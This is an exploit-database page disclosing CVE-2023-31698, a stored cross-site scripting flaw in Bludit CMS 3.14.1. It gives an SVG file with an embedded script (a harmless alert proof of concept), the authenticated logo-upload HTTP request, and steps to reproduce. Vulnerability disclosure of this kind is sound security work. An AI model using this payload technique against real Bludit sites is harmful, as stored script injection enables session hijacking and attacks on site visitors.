Bludit CMS 3.14.1 Cross Site Scripting

2023.05.20
Credit: Rahad Chowdhury
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2023-31698
CWE: CWE-79

# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-04-15 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.bludit.com/ # Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1 # Version: 3.14.1 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31698 SVG Payload ------------- <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> save this SVG file xss.svg Steps to Reproduce: 1. At first login your admin panel. 2. then go to setting and click logo section. 3. Now upload xss.svg file so your request data will be POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998 Referer: http://127.0.0.1/bludit/admin/settings Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i Content-Length: 651 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="tokenCSRF" 626c201693546f472cdfc11bed0938aab8c6e480 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="inputFile"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------15560729415644048492005010998-- 4. Now open logo image link that you upload. You will see XSS pop up.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top